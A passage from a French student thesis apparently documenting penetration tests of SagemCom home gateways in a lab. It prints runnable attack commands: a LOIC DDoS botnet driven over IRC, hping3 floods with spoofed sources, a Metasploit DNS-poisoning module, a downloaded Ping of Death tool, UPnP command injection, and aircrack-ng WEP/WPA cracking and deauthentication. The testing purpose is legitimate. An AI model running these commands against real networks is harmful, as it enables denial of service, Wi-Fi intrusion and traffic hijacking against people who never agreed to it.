Dans ce profil de scan, tous les ports TCP et UDP sont scanns ainsi que les versions des services et tous les scripts sont utiliss. Nmap offre la possibilit du Scripting Scan . Cette fonctionnalit permet lautomatisation des scans personnaliss. Par dfaut, nmap offre une grande bibliothque des scripts tels que dtection des vulnrabilits, des backdoors, des exploitations sur certains services, etc.
nmap -sS -sU -T4 -A -v -PE -PS -PA -PU --script all 192.168.1.1

-PE : ping echo pour voir si la machine rpond ou pas. -PS : Dcouverte TCP SYN. -PA : Dcouverte TCP ACK. -PU22 : Dcouverte UDP.

2.2.

Scan des vulnrabilits

Dans cette partie nous parlons de deux types de scanneurs : scanneur des vulnrabilits automatiques et des scanneurs des vulnrabilits web.

22

Les options PS/PA/PU peuvent tre utilises en spcifiant les numros des ports tester, ou scanner les ports par dfauts sils sont utiliss sans arguments.

Page 56

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

2.2.1. Scanneurs des vulnrabilits automatiques


Dans le chapitre prcdent nous avons list plusieurs scanneurs. En se basant sur ltude comparative, nous choisissons la version gratuite de Nessus car elle est extensible et personnalisable et offre les fonctionnalits ncessaires pour nos tests, au contraire des autres scanneurs (exemple : OpenVas est extensible mais il se base sur des outils qui ncessite une installation et une configuration additionnelles). 2.2.1.1. Outil de tests

Sous BackTrack Nessus est install par dfaut, il ne reste que son activation. Pour ce faire, il faut rcuprer la cl dactivation du site officiel. Il faut ensuite utiliser ces commandes qui ncessitent une connexion internet.
root@bt:~# /opt/nessus/bin/nessus-fetch --register M4D0-EWWQ-1EZU-3KSN Your activation code has been registered properly - thank you. Now fetching the newest plugin set from plugins.nessus.org... Your Nessus installation is now up-to-date. If auto_update is set to 'yes' in nessusd.conf, Nessus will update the plugins by itself.

Il faut crer dabord un utilisateur administrateur pour Nessus :


root@bt:~# /opt/nessus/sbin/nessus-adduser Login : root Login password : Login password (again) : Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y User rules ---------nessusd has a rules system which allows you to restrict the hosts that carlos has the right to test. For instance, you may want him to be able to scan his own host only. Please see the nessus-adduser manual for the rules syntax Enter the rules for this user, and enter a BLANK LINE once you are done : (the user can have an empty rules set) Login : root Password : *********** This user will have 'admin' privileges within the Nessus server Rules : Is that ok ? (y/n) [y] User added

Ensuite lancer Nessus :


root@bt:~# /etc/init.d/nessusd start Starting Nessus : .

Le service Nessus tourne sur le port 8834 en utilisant son propre certificat. En accdant sur https://localhost:8834/, un utilisateur peut se connecter pour dmarrer, crer ou configurer un scan ou un profile de scan (Voir figure 27).

Page 57

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Figure 26 Page de connexion

2.2.1.2.

Tests raliss

Lutilisation des profils par dfaut est un gaspillage de temps puisquils utilisent tous les plugins disponibles y comprit ceux de Windows et quelques technologies non utilises dans les systmes embarqus. Pour cela, il est indispensable de crer nos propres profils de scan.

Figure 27 Crer profile

Test4 : Scan partir du LAN


Dans ce scan, nous utilisons trois politiques de scans : Customized Internal Network Scan : cest une politique de scan personnalise base sur Internal Network Scan . Afin doptimiser le scan nous dsactivons les plugins relatifs Windows et au VMWare, car nous savons davance que lOS de la GW est bas sur LINUX. Pour ce faire, nous accdons sous Preferences -> Global variable settings puis nous cochons Throrough tests (slow) pour forcer Nessus continuer lexploit sil trouve une faille. Sous Preferences -> HTTP login page nous remplissons les champs avec les informations

Page 58

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

ncessaires. (ces informations peuvent tre rcupres en utilisant le plugin Firefox Live HTTP Headers 23 et firebug 24)

Figure 28 Configuration des plugins

Web App Tests : est un profil pour scanner les applications WEB. Prepare for DCI PSS audits: est un profil pour un scan des vulnrabilits respectant les clauses daudit DCI PSS.

Test5 : Scan partir du WAN


Dans le scan ralis partir dun PC WAN, nous utilisons une seule politique de scan : Customized External Network Scan : Politique personnalise base sur la politique par dfaut External Network Scan , nous dsactivons les plugins Windows et VMWare. Sous Preferences -> Global variable settings nous cochons Throrough tests (slow) pour forcer Nessus continuer lexploit sil trouve une faille.

Rsultat de scan :
Les rsultats des scans peuvent tre exports vers plusieurs types de fichiers: Nessus, HTML, etc. Les fichiers Nessus sont des fichiers XML. Ils peuvent tre utiliss par dautres outils tels que Metasploit (Voir Annexe 3 et Annexe 4). Les rapports des scans sont clairement reprsents. Ils sont classs par numro de port pour le quel est associ lensemble possibles des failles avec leur svrit.

23 24

Plugin Firefox qui dtecte et analyse les requtes HTTP. Plugin Firefox qui analyse et modifie le contenu de la page web. Il offre une console JavaScript.

Page 59

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Figure 29 Exemple du rsultat

2.2.2. Scanneurs des vulnrabilits Web


Dans cette partie nous nous concentrons sur les scanneurs des vulnrabilits web. Comme il est prsent dans le chapitre prcdent, les scanneurs disponibles sur le march ne sont pas utiles 100% dans notre cas. Pour cela, nous ralisons des tests manuels, en suivant la mthode OWASP. 2.2.2.1. Outils de tests

Nikto peut tre intgr avec Nessus, dans ce cas Nessus se charge de faire le plus grand nombre de scans avec Nikto. Cela peut nous faire gagner normment de temps dans les tests et centraliser le rsultat dans Nessus. Pour cela il faut vrifier bien que le fichier nikto.nasl existe dans /opt/Nessus/lib /nessus/plugins .
ls -l /opt/nessus/lib/nessus/plugins/nikto.nasls /opt/nessus/sbin/nessusd -R // pour redmarrer Nessus

Lutilisation dun proxy web est ncessaire pour la ralisation des tests. Dans notre cas, nous utilisons le proxy OWASP-ZAP qui permet la rception, lanalyse et mme la modification de requtes envoyes vers le TR. Pour cela il faut configurer le navigateur pour quil se connecte via le proxy. 2.2.2.2. Tests raliss

Test4: Fuzzing avec OWASP -ZAP


Lutilisation de ce proxy web nous aide faire des tests sur la GUI aprs lauthentification. Avec ZAP, nous ralisons un test de fuzzing . Dans ce test nous allons intercepter les requtes

Page 60

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

envoyes vers le TR lors de sa configuration partir de la GUI puis nous injectons des donnes avec une taille importante (exemple : 700 000 caractres, a par exemple)

Figure 30 Exemple Fuzzing

Le but de ce test est de vrifier si le TR fait un contrle sur les donnes reues ou se limite au contrle ralis cot client. Ci-dessous nous prsentons quelques tests raliss en suivant la mthode OWASP [23]. ID-OWASP owasp-cm-001 owasp-cm-008 owasp-at-002 owasp-at-004 Tests SSL/TLS Mthodes HTTP supportes par le serveur numrer les utilisateurs brute force Attack sur le login et mot de passe Outils THC-SSL-DOS Nessus Plugin id: 43111 hydra Description Attaque DOS ciblant le service SSL GET HEAD POST, reste vrifier par un autre outil. la mthode TRACE n'est pas accepte raliser plusieurs essaie de connexion avec des diffrentes combinaisons. l'authentification au gui et de type "HTTP form based authentification" et utilise deux nombres alatoirement pour chaque session ouvrir.

Tableau 9 Tests owasp raliss

Test5: owasp-cm-001 SSL/TLS


Ce test cible le service SSL sur le TR, en se basant sur les rsultats de scan des services. Avec loutil THC-SSL-DOS nous lanons plusieurs demandes de connexions scurises25 sur le TR sans attendre la rponse (mme principe de lattaque SYN Flood).
./thc-ssl-dos <@IP> <n port>

Le but de ce test est de vrifier le comportement de TR aprs une telle attaque notamment la stabilit de ces diffrents services.

25

Ltablissement dune connexion SSL requit 15x plus de performance pour le serveur que pour le client [19].

Page 61

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Test6: owasp-cm-008 Mthodes HTTP supports


Certaines mthodes http (pour prciser la mthode TRACE) peuvent aider la ralisation de quelques attaques comme XSS (Cross Site Scripting), XST (Cross Site Tracing). Pour cela il y a deux mthodes : Automatique : avec Nessus, aprs la dtection dun ou de services HTTP, il dtermine les mthodes autorises laide du plugin n43111. Manuelle : laide dun client Telnet ou avec netcat, nous pouvons connatre ces mthodes :

nc www.victim.com 80 OPTIONS / HTTP/1.1 Host: www.victim.com HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 31 Oct 2006 08:00:29 GMT Connection: close Allow: GET, HEAD, POST, TRACE, OPTIONS Content-Length: 0

Test7: owasp-at-004 numrer les utilisateurs


Ce test pour but de lister les utilisateurs possibles sur le systme (TR dans notre cas). Ce scnario ne ncessite aucun outil. Il suffit de tester plusieurs combinaisons de login et mot de passe puis analyser les rponses du serveur (Utilisateur valide / mot de passe non valide, utilisateur non valide/ mot de passe non valide, etc).

Test8: owasp-at-004 brute force attack


Le but de ce test est de dterminer le mot de passe dun utilisateur. Ce teste vise vrifier si les TRs implmentent un mcanisme contre ce type dattaque ou non. Avant dentamer lattaque, nous devons dabord dterminer partir du code source de la page dauthentification la mthode dauthentification (authentification HTTP ou authentification bas sur le FORM ). Dans notre cas le TR utilise deux nombres alatoires pour chaque session ouvrir. Donc la ralisation de cette attaque ncessite des outils trs sophistiqus qui offrent la possibilit de rcupration des paramtres aprs chaque essai de connexion et de les injecter dans une nouvelle requte envoyer.

2.3.

Attaques et exploits

Dans cette partie, en se basant essentiellement sur les rsultats de scan des ports nous procdons comme suit : tout dabord nous dterminons les ports ouverts sur le systme ensuite nous identifions les versions des services et enfin son OS. Ces trois informations sont trs utiles pour orienter les tests dans le bon sens sans perdre du temps. Dans ce qui suit nous ralisons un ensemble des tests ncessaires pour garantir la robustesse des TRs SagemCom contre les nouvelles attaques ainsi que les anciennes.

Page 62

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

2.3.1. Outils de tests


LOIC : il est ddi pour les attaques de type DDOS, dj utilis par Anonymous lors de leurs attaques sur les sites gouvernementaux pendant la rvolution Tunisienne en dcembre 2010 et beaucoup dautres attaques utilises un peu partout dans le monde. Pour effectuer cette attaque, il tente d'attaquer par dni de service distribu (DDOS ) le site cibl en inondant le serveur avec des paquets TCP, des paquets UDP, ou des demandes HTTP avec l'intention de perturber le service d'un hte particulier [24]. UnrealIRC : cest un serveur de messagerie instantane bas sur le protocole de communication textuelle sur internet (Internet Relay Chat : IRC) qui permet des clients IRC de crer une connexion avec une machine distante considre comme le serveur IRC. Il sert la communication instantane principalement sous la forme de discussions en groupe par lintermdiaire des canaux de discussion et peut jouer comme dans notre cas le rle dun serveur C&C : command and control server. UnrealIRCd est riche en fonctionnalits, citons comme exemple le server-to-server linking, lauditing mais aussi le filtrage de message. XChat IRC : Cest un client IRC utilis par ladministrateur de lattaque pour contrler les clients LOIC (paramtrage des cibles, le type de lattaque : HTTP, TCP, UDP, etc). Hping : Cest un gnrateur de paquets et un outil daudit scurit. hping peut tre utilis pour lancer des attaques de type DDOS telles que Syn Flood, UDP Flood et ICMP Flood. Afin de raliser des attaques efficaces, nous lanons les tests de plusieurs machines en mme temps.

2.3.2. Tests raliss


Test9: (TCP/UDP/HTTP Flood) Topologie du rseau IRC Server:
OS: Linux (Back Track 5). Adresse IP: 192.168.1.2/24. Applications et services : Serveur IRC UnrealIRCD .

PC Desktop # et PC Portable:
OS: Windows XP SP2, Windows Vista et Linux (Back Track 5). Adresse IP: 192.168.1.[3-8]/24. Applications et services : LOIC V 1.1.1.25.

Page 63

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Figure 31 Architecture rseau de l'attaque

Procdure de lattaque
Nous vrifions bien que unreal est en cours dexcution. Par la suite, nous crons un canal IRC et nous lanons le client IRC XChat puis nous configurons le serveur sur lequel nous allons nous connecter. Nous choisissons le serveur et nous appuyons sur Connect puis nous crons le canal #sagemseclabDDOS dont les clients IRC dans notre cas LOIC . Les clients IRC connects sur le canal sont affichs droite (Voir figure 33).

Figure 32 Fenetre XCHAT (Administrateur)

Page 64

Chapitre 4 Configuration du LOIC

Mise en place dune solution de tests de scurit des TRs

Sur les machines Windows, il suffit dexcuter LOIC (Voir figure 34).

Figure 33 Interface LOIC

Sur les machines BackTrack 5, nous pouvons excuter LOIC en accdant au dossier et en ajoutant le droit dexcution au fichier LOIC.exe puis en le lanant avec la commande wine .
cd /root/Desktop/tools/loic.v1.1.1.25 chmod +x LOIC.exe wine LOIC.exe

Lancement de lattaque
Depuis le client XCHAT, ladministrateur du canal, lance lattaque avec lenvoi de cette commande aux clients :
!lazor targetip=192.168.1.1 message=DDOS_ATTACK port=80 method=tcp wait=false random=true start

targetip: le serveur web cible. message : sera mit dans la partie donne du paquet tcp ou udp. port : port 80 du serveur web. methode : tcp, udp ou http. start : pour lancer lattaque.

Page 65

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Figure 34 Lancement de l'attaque

Test10 : (SYN/UDP/ICMP Flood) Scnario 1 : SYN Flood


Lenvoi des paquets SYN successifs sans attendre la rponse du serveur engendre la mise hors service de la GW pendant et aprs lattaque. Le but de cette attaque est de mettre hors service la GUI.
hping3 S p 80 i u10 192.168.1.1

-S : Paquets SYN . -p : le port destination 80. -i : le nombre de paquets envoys par seconde est u10 signifiant un paquet chaque microseconde (1paquet/Sec).

Scnario 2 : UDP Flood


Cette attaque pour but denvoyer plusieurs paquets UDP sur un port bien prcis. Dans notre cas le but est dattaquer le serveur DHCP de la GW.
hping3 -udp s 68 p 67 i u10 192.168.1.1

--udp : envoi des paquets UDP. -s : Port source, 68 protocole DHCP . -p : Port destination, 67 protocole DHCP . -i : u1, 1 paquet/S.

Page 66

Chapitre 4 Scnario 3 : ICMP Flood

Mise en place dune solution de tests de scurit des TRs

Lattaque ICMP Flood consiste envoyer plusieurs paquets ICMP de type (echo Request) avec des adresses IP diffrentes vers un serveur.
hping3 -icmp i u1 --rand-source 192.168.1.1

--icmp : le type des paquets forger. --rand-source : envoie des paquets avec des adresses IP spoofes.

Test11 : Dns cache poisoning


Cette attaque consiste modifier le cache dun serveur DNS afin dorienter les demandes des connexions vers un serveur malicieux autre que le serveur demand.

Etape dattaque :
Un utilisateur malicieux envoie une requte DNS son serveur de noms associe (SERVER A) pour rsoudre le nom de domaine (example.com). Si (SERVER A) na pas ladresse IP associ au nom de domaine, il envoie une requte DNS un autre serveur DNS (SERVER B) et ainsi de suite jusqu' trouver ladresse IP demande. Lattaquant envoie plusieurs milliers de rponses DNS au (SERVER A) avec ladresse spoofe du (SERVER B) avec des identifiants alatoires. Ladresse IP contenue dans la rponse est celle dun autre serveur (appartenant lattaquant) Etant donn lattaque est russite (SERVER A), ce dernier crit dans son cache adresse IP de lattaquant. Toutes les nouvelles demandes de rsolution du (example.com) seront rpondues par une fausse adresse IP.

Vulnrabilit :
Version : BIND 9.6.1-P2. Avec DNSSEC validation enabled , checking disabled (CD) o le serveur supporte les requtes rcursives est vulnrable pour une attaque de type DNS Cache Poisoning . Lexploit de cette faille est disponible sur le site Exploit Database ou directement sur Metasploit Framework 3 [25].

Scnario de test :
Scanner les ports ouverts sur la passerelle afin de dterminer la version du serveur DNS implment sil existe. Attaque DNS cache poisoning (lutilisation de lexploit selon la version de serveur DNS) Le rsultat de test doit tre comme suit: modifier le cache DNS afin de fournir ladresse IP Google.fr au lieu de ladresse Yahoo.fr.

Page 67

Chapitre 4 Exploitation :

Mise en place dune solution de tests de scurit des TRs

Avant de lancer lexploit, nous devons dterminer les ports ouverts sur la passerelle pour dterminer la version du serveur DNS sil existe.
nmap -sU -sV -p53 -T4 192.168.0.1

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-21 12:08 CET Warning: 192.168.0.1 giving up on port because retransmission cap hit (6). Nmap scan report for HomeGateway.home (192.168.0.1) Host is up (0.00089s latency). Not shown: 1982 closed ports PORT STATE SERVICE VERSION 80/tcp open http? 2222/tcp open EtherNet/IP-1? 53/udp open domain ISC BIND 9.6.1-P2 67/udp open|filtered dhcps 68/udp open|filtered dhcpc

Remarque :
Les rsultats du scan ne sont pas toujours justes, cest le cas de ce scan car la passerelle est joue le rle dun DNS Relay . Pour dterminer ladresse IP du serveur google.fr, on excute les commandes suivantes :

ping www.google.fr

Envoi d'une requte 'ping' sur www.l.google.com [74.125.39.147] avec 32 octets

Pour tester lexploit sur le serveur Bind 9.6.1-P2 , sous le terminal nous lanons metasploit :
cd /pentest/exploits/framework3/ ./msfconsole

, , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ + -- --=[ + -- --=[ =[ metasploit v4.1.0-release [core:4.1 api:1.0] 748 exploits - 384 auxiliary - 92 post 228 payloads - 27 encoders - 8 nops svn r13994 updated 6 days ago (2011.10.18)

Pour lancer lexploit nous excutons les commandes Metasploit suivantes :26

26

Le ou les serveurs DNS utiliss par le TR peuvent tre rcuprs partir de la GUI.

Page 68

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

msf > use auxiliary/spoof/dns/bailiwicked_host msf auxiliary(bailiwicked_host) > show options Module options (auxiliary/spoof/dns/bailiwicked_host): Name Current Setting -----------------HOSTNAME pwned.example.com INTERFACE NEWADDR 1.3.3.7 RECONS 208.67.222.222 RHOST SNAPLEN 65535 SRCADDR Real queries (accepted: Real, Random) SRCPORT automatic) Configurer les paramtres : TIMEOUT 500 TTL 31556 msfXIDS auxiliary(bailiwicked_host) 0 hostname => yahoo.fr automatic) msf auxiliary(bailiwicked_host) newaddr => 74.125.39.147 msf auxiliary(bailiwicked_host) rhost => 192.168.0.1 msf auxiliary(bailiwicked_host) recons => 10.64.16.3 msf auxiliary(bailiwicked_host) Required -------yes no yes yes yes yes yes yes

Le nom de domaine modifier

Description La nouvelle adresse IP, dans ----------notre cas 74.125.39.147 Hostname to hijack The name of the interface Le DNS utilis par la passerelle New address for hostname The nameserver used for reconnaissance Ladresse IP de la victime The target address The number of bytes to capture The source address to use for sending the The target server's source query port (0 for

yes The number of seconds to wait for new data yes The TTL for the malicious host entry > set hostnamenumber of XIDs to try for each query (0 for yes The yahoo.fr > set newaddr 74.125.39.147 > set rhost 192.168.0.1 > set recons 10.64.16.3 > show options

Module options (auxiliary/spoof/dns/bailiwicked_host): Name Current Setting -----------------HOSTNAME yahoo.fr INTERFACE NEWADDR 74.125.39.147 RECONS 10.64.16.3 RHOST 192.168.0.1 SNAPLEN 65535 SRCADDR Real queries (accepted: Real, Random) SRCPORT automatic) TIMEOUT 500 TTL 31556 XIDS 0 automatic) Required -------yes no yes yes yes yes yes yes yes yes yes Description ----------Hostname to hijack The name of the interface New address for hostname The nameserver used for reconnaissance The target address The number of bytes to capture The source address to use for sending the The target server's source query port (0 for The number of seconds to wait for new data The TTL for the malicious host entry The number of XIDs to try for each query (0 for

La commande check vrifie lexploit avant de le lancer sur la cible. Elle permet de dterminer si le serveur DNS est vulnrable cette attaque ou non :
msf auxiliary(bailiwicked_host) > check

[*] Using the Metasploit service to verify exploitability... [-] ERROR: This server is not replying to recursive requests

Test12: Attaque Ping Of Death Description:


Lattaque consiste envoyer un ou plusieurs paquets ICMP de type echo-request dont la taille est suprieure 65507 Octets. Les paquets sont alors fragments. Cette attaque provoque larrt du systme dexploitation [26]. Les systmes vulnrables sont : Windows (95, NT, 3.11).

Page 69

Chapitre 4
MSDOS. Mac OS 7. Solaris (x86) 2.4 & 2.5. Linux Kernel <= 2.0.23.

Mise en place dune solution de tests de scurit des TRs

Outils :
PingOfDeath.c est un code source dvelopp par Jeff w.Roberson, tlchargeable partir du site Inifinity Exists. Cet outil permet denvoyer des paquets ICMP fragments avec une adresse IP spoofe.

Procdure de lattaque :
Tlchargement du code source :

wget http://infinityexists.com/downloads/PingOfDeath-Jolt.c

--2011-10-12 16:55:31-- http://infinityexists.com/downloads/PingOfDeath-Jolt.c Resolving infinityexists.com... 69.163.252.17 Connecting to infinityexists.com|69.163.252.17|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4013 (3.9K) [text/x-c] Saving to: `PingOfDeath-Jolt.c.1' 100%[========================================================>] 4,013 0.3s 2011-10-12 16:55:32 (13.8 KB/s) - `PingOfDeath-Jolt.c.1' saved [4013/4013] 13.8K/s in

Compilation du code et gnration de lexcutable PoD :

gcc PingOfDeath-Jolt.c -o PoD

Excution de lattaque :

./PoD 192.168.1.1 1.1.1.1

Sending Sending Sending Sending Sending

to to to to to

192.168.1.1 192.168.1.1 192.168.1.1 192.168.1.1 192.168.1.1

o o

192.168.1.1 : Adresse de la GW. 1.1.1.1 : Adresse spoofe.

Page 70

Chapitre 4 Rsultat de lattaque :

Mise en place dune solution de tests de scurit des TRs

Ci-dessous, un imprime cran du sniffeur Wireshark pendant lattaque :

Figure 35 Capture de trafic lors de l'attaque

2.3.3. Anciennes attaques


TearDrop Attack
Plus connue sous le nom de Teardrop Attack, Bonk ou encore Boink, cette attaque utilise une faille propre certaines piles TCP/IP. Cette vulnrabilit concerne la gestion de la fragmentation IP. Ce problme apparat lorsque la pile reoit le deuxime fragment d'un paquet TCP contenant comme donne le premier fragment. La pile TCP/IP peut s'avrer incapable de grer cette exception et le reste du trafic. Cette faille est trs connue sur plusieurs OS27.

Land Attack
Cette attaque consiste envoyer des paquets dont ladresse IP et le port source et destination sont les mmes. Cette attaque affecte les anciens systmes dexploitations. Les systmes vulnrables sont Windows (95, NT 4.0), HP-AIX (<=9.00). Les systmes Linux ne sont pas vulnrables cette attaque.
27

OS vulnrables TearDrop Attack : IBM AIX, WindRiver BSDOS, SGI IRIX, Linux Kernel , Sun Solaris,

IBM OS2, Microsoft Windows 95, Data General DG/UX, Microsoft Windows NT: 4.0, Microsoft Windows 98, Novell NetWare, SCO SCO Unix, Microsoft Windows 98SE, Microsoft Windows 2000, Microsoft Windows Me, Compaq Tru64, Microsoft Windows XP, SCO Caldera OpenLinux: 1.1, Apple Mac OS, Microsoft Windows 2003 Server [27].

Page 71

Chapitre 4 The Tiny Fragment Attack

Mise en place dune solution de tests de scurit des TRs

Cest une attaque fragmentation des paquets sur plusieurs petits fragments dans le but de forcer le dcalage de quelques informations de lentte TCP vers dautres fragments. Elle engendre linstabilit des anciens systmes [28].

Zero length IP
Cette attaque permet un attaquant distance denvoyer des milliers de paquets IP avec une taille nulle. Ceci provoque le crash de quelques systme (Linux Kernel => 2.2.4 ne sont plus vulnrables cette attaque) [35].

WinNuke Attack
Cette attaque provoque le crash de quelques systmes dexploitation Windows [29].

Smurfing attack
Cest une attaque de type DDOS o lattaquant envoie en diffusion sur le rseau une requte ICMP de type echo-request avec ladresse spoofe de la victime. La rponse simultane de toutes les machines du rseau provoque linstabilit du systme. Cette attaque ne prsente aucun risque face la puissance actuelle des machines [30].

IP Spoofing
Cette technique (Voir figure 37) permet de cacher la vraie identit dun attaquant lors de son attaque. LIP Spoofing est la base de plusieurs attaques. Dans notre cas nous tudions lattaque vol de session ou en anglais Hjacking . Cette attaque sert voler la session de connexion entre un serveur et une machine de confiance [31].

Figure 36 Attaque base de lIP Spoofing

Page 72

Chapitre 4 Remarque :

Mise en place dune solution de tests de scurit des TRs

Pour garder la connexion avec le serveur, il existe plusieurs techniques: Sniffing sur le rseau, puis ralisiation de statistiques permettant la prdiction du bon numro de squence (la plupart des machines actuelles ne permet pas cette option). Lexploitation de loption Source Routing du protocole IP afin de dfinir le chemin de retour des paquets envoys. Blind attack base sur la prdiction de numro de squence. Aprs un scan intensif avec nmap (Voir Test2: Scan des services) lindice de difficult est trs haut TCP Sequence Prediction , cela indique que la prdiction est presque impossible et demande des algorithmes trs sophistiqus ainsi quune bande passante norme [32].
TCP Sequence Prediction: Difficulty=204 (Good luck!)

3. Module UPnP
3.1. Prsentation des tests

Dans le chapitre prcdent, nous avons prsent le protocole UPnP ainsi que les risques quil peut prsenter pour les TRs. Dans cette partie, nous fixons quelques tests pour vrifier la scurit des TRs lie lactivation dUPnP. Ces tests visent les IGD et ils sont rpartis comme suit : Test12: ajout dune rgle portmapping invalide. Test13 : injection du code.

3.2.
But

Tests realiss

Test13: ajout dune rgle portmapping invalide

Le but de ces tests est de vrifier si les TRs sont vulnrables aux attaques UPnP connus.

Droulement de test
Tous dabord nous devons dterminer les quipements UPnP disponibles avec loutil UGUPnP Universal Control Point .

Page 73

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Figure 37 Dtection des quipements UPnP sur le rseau

Par la suite, nous vrifions lexistence du profile WANIPConnection . Sil existe nous choisissons laction AddPortMapping et nous essayons dajouter une rgle port mapping dont lattribue NewInternelClient = 8.8.8.8.

Figure 38 Action AddPortMapping

Enfin, nous vrifions si cette rgle est ajoute ou pas avec lune de ces deux mthodes : GetGenericPortMappingEntry : action pour la rcupration dune rgle portmapping, elle prend en entre lindex de la rgle et retourne ses diffrents attribues.

Page 74

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

GetSpecificPortMappingEntry : action pour la rcupration dune rgle portmapping, elle prend en entre le numro du port distant, ladresse IP destination et le protocole et retourne ses diffrents attribues.

Figure 39 Actions GetSpecificPortMapping et GetGenricPortMapping

Test14: injection du code


Mme tape suivre de lautre test, mais au lieu dutiliser une autre adresse IP, nous injectons un code ou une commande. Etant donner que les systmes dexploitation de la plus part des quipements rseau sont bass sur Linux Kernel nous essayons quelques commandes connus comme reboot , halt , etc. Dans nos tests, nous procdons de deux manires diffrentes. En effet, nous utilisons la mthode Black Box et nous injectons des commandes linux dune faon alatoire. Aussi, nous utilisons la mthode White Box et nous injectons des commandes qui existent rellement sur lOS du TR.

4. Module WIFI
4.1. Prsentation des tests

Pour le module WIFI, nous ralisons les attaques les plus connues dans le monde du WIFI. Test14 : Craquage des cls de chiffrement. Test15 : Perturbation des connexions.

Page 75

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

4.2.

Tests raliss

Test15 : Craquage des cls de chiffrement


Les TRs SagemCom offre deux types de chiffrement (WEP et WPA). Comme il est dcrit dans le chapitre prcdent, le craquage des cls WEP est trs simple vu la faiblesse dans lalgorithme de chiffrement. Par contre, le craquage des cls WPA/WPA2 est impossible 28 sauf avec une attaque de type dictionnaire (ncessite la dtection dauthentification dun client).

Scnario 1 : Craquage cl WEP


Cette attaque est trs connue et il existe une gamme complte doutils permettant sa ralisation dune faon automatique. Ci-dessous, nous dcrivons le droulement du scnario : Activer la carte wifi en mode monitor :
airmon-ng start wifi0 6

6 : canal dcoute

Capturer le trafic avec la commande airodump-ng :


airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w output wifi0

-c 6: Commencer lcoute sur le canal numro 6 --bssid : adresse MAC du point daccs. -w : fichier de captures. Utiliser aireplay-ng pour raliser des fausses authentifications avec le point daccs. Le but de

cette tape est dassocier ladresse mac au point daccs :


aireplay-ng -1 0 -e sagemseclab -a 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 wifi0

-1 : envoi des requtes dauthentification au point daccs. -e : nom du rseau. -a : adresse MAC du point daccs. -h : adresse MAC source.

28

En 2008 deux chercheurs allemands en scurit, Erik Tews et Martin Beck3, ont annonc avoir dcouvert une faille de scurit dans le mcanisme de scurit WPA utilis avec l'algorithme TKIP (Temporal Key Integrity Protocol) et en 2009, des chercheurs japonais, Masakatu Morii et Toshihiro Ohigashi, mettent au point une attaque permettant, en une minute, de falsifier des paquets de type ARP ou DNS.

Page 76

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Utiliser aireplay-ng pour gnrer plus de trafic en envoyant des ARP request 29:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 wifi0

-3: envoi des requtes ARP. -b: adresse MAC du point daccs

Finalement, craquer la cl avec aircrack-ng :


aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

La dure de cette attaque varie entre 10 minutes des heures selon le taux dinformations captur.

Scnario 2 : Craquage cl WPA/WPA2


Le craquage du WPA ncessite un dictionnaire contenant un grand nombre de mots de passe possibles. La taille dun dictionnaire peut varier entre quelque MO quelques GO. Les tapes de lattaque sont comme suit : Activer la carte wifi en mode monitor :

airmon-ng start wifi0 6

Capturer le trafic avec la commande airodump-ng :


--bssid 00:14:6C:7E:40:80 -w output wifi0

airodump-ng -c 6

Utiliser airplay-ng pour forcer la de-authentification dun client connect au point daccs qui va automatiquement sauthentifier de nouveau. Cette tape est obligatoire car le craquage de la cl WPA ncessite la dtection de la phase de lauthentification.

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 wifi0

o o o

-0 1 : de-authentification. lenvoi dune seule deauths (nous pouvons envoyer plusieurs) -a : adresse du point daccs. -c : adresse de lutilisateur de-authentifier.

Utiliser aircrack-ng pour craquer la cl. o -w : liste de mot de passe tester. Cette liste peut tre tlcharg de linternet ou gnrer laide de plusieurs outils (par exemple : John The Ripper)

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 output*.cap

29

Il faut environ 20,000 paquets pour les cls 64-bit et de 40,000 jusqu 85,000 paquets for 128 bit.

Page 77

Chapitre 4

Mise en place dune solution de tests de scurit des TRs

Test16: Perturbation des connexions


Linjection des paquets ARP dans le rseau sans fil peut affecter la qualit du signale et mme engendre la mise hors service de tout le rseau. Ce test ncessite un rseau sans fil scuris avec une cl de chiffrement WEP. Pour aboutir un rsultat, il faut que le sniffeur dtecte au moins un paquet ARP pour quil puisse injecter des paquets ARP. Lattaque est possible avec loutil airplay-ng.
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:11:22:33:44:55 wifi0

5. Module VoIP
5.1. Prsentation des tests

Nous avons fix un ensemble de tests primaires sur les TRs qui consiste dterminer leurs effets sur le fonctionnement du module test ainsi que les autres modules. Nos tests touchent deux axes : Attaque li au dni de service. Attaque li la vole de session SIP.

5.2.

Tests raliss

5.2.1. Dni de service


Test17: SYN/UDP Flood (SIP)
Il sagit du mme principe de lattaque SYN Flood dcrite dans le module rseau. Nous avons ralis deux scnarios.

Scnario 1: SYN/UDP Flood simple:


La ralisation de cette manipulation nous permet de tester la robustesse du TR contre ce type dattaque ainsi que la configuration de son pare-feu. Pour cela nous avons utilis loutil HPING.
hping3 S p 5060 i u10 @WAN hping3 -udp p 5060 i u10 @WAN

Scnario 2 : SYN/UDP Flood avec technique dvasion :


